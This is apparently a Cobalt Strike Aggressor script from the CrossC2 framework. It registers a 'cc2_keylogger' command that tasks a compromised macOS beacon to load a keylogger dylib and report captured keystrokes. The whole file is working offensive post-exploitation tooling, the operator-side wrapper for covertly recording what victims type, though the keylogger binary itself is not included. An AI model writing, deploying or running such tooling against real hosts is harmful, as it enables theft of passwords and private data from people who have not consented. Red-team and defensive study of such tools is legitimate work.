
include(script_resource("CrossC2Kit.cna"));

sub printUsage_keylogger {
    blog($1, "\nUsage: cc2_keylogger <linux(32)/osx> <process display name>\n\tlisten to the string entered by the user from the keyboard.\nEx:\n\tcc2_keylogger osx test");
}

ssh_alias cc2_keylogger {
    $taskName = "cc2_keylogger_osx"; # taskName
    $taskType = "dylib";  # $taskType -> ELF, MachO, so, dylib
    $taskResType = "keystrokes"; # keystrokes -> keylogger message

    $beaconid = $1;
    $arch = $2;
    $displayName = $3;
    $transportArg = $displayName."^";

    if ($arch eq "osx") {
        $loadlib = "gather/keylogger/osx/keylogger_file.dylib";
    } else {
        berror($beaconid, "*[error]: Only supports osx.");
        printUsage_keylogger($beaconid);
        return;
    }
    if ($displayName) {
        blog($beaconid, "cc2_keylogger: ");
        bcrossc2_load_dyn($beaconid, $taskType, $taskName, $taskResType, $loadlib, $transportArg);
    } else {
        printUsage_keylogger($beaconid);
    }

}

ssh_command_register("cc2_keylogger", "CrossC2 keylogger - listen to the string entered by the user from the keyboard.", "\nUsage: cc2_keylogger <linux(32)/osx> <process display name>\n\tlisten to the string entered by the user from the keyboard.\nEx:\n\tcc2_keylogger osx test");